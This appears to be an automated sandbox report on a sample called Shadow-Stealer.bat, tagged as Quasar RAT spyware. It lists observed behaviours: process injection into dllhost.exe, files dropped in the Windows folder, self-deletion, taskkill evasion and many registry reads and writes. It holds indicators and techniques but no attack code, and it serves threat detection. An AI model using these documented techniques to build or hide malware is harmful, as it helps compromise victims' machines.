Malware Analysis Report

2024-10-19 06:33

Sample ID 240528-k1tfysee89
Target Shadow-Stealer.bat
SHA256 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Tags
quasar v2.2.6 | tinsler spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724

Threat Level: Known bad

The file Shadow-Stealer.bat was found to be: Known bad.

Malicious Activity Summary

quasar v2.2.6 | tinsler spyware trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar RAT

Quasar payload

Suspicious use of NtCreateProcessExOtherParentProcess

Deletes itself

Executes dropped EXE

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Enumerates system info in registry

Kills process with taskkill

Checks processor information in registry

Uses Task Scheduler COM API

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-28 09:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-28 09:04

Reported

2024-05-28 09:35

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1803s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 4512 created 6000 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe
PID 3884 created 5520 N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe
PID 5724 created 5836 N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\dllhost.exe

Deletes itself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1904 set thread context of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 set thread context of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 892 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 set thread context of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 set thread context of 3032 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 1604 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 5628 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 5728 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 5280 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 3892 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 6000 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 6128 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 5520 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 set thread context of 5836 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 set thread context of 5516 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={9978C964-30BF-4865-8D88-D53FC5CFA57E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887200" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:06:42 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = ":BackgroundTransferApi:" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi" C:\Windows\system32\DllHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e17a755fe1b0da01e17a755fe1b0da01e17a755fe1b0da01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000366332653934636136653565313632336632366236656430393433663566643364613764356161343437303330303366353164656366386133373734393761620000b20009000400efbebc58894bbc58894b2e000000000000000000000000000000000000000000000000001f2a3500360063003200650039003400630061003600650035006500310036003200330066003200360062003600650064003000390034003300660035006600640033006400610037006400350061006100340034003700300033003000300033006600350031006400650063006600380061003300370037003400390037006100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633265393463613665356531363233663236623665643039343366356664336461376435616134343730333030336635316465636638613337373439376162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f2f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f2f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003000300031003100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9c458510-c332-4d3e C:\Windows\System32\RuntimeBroker.exe N/A
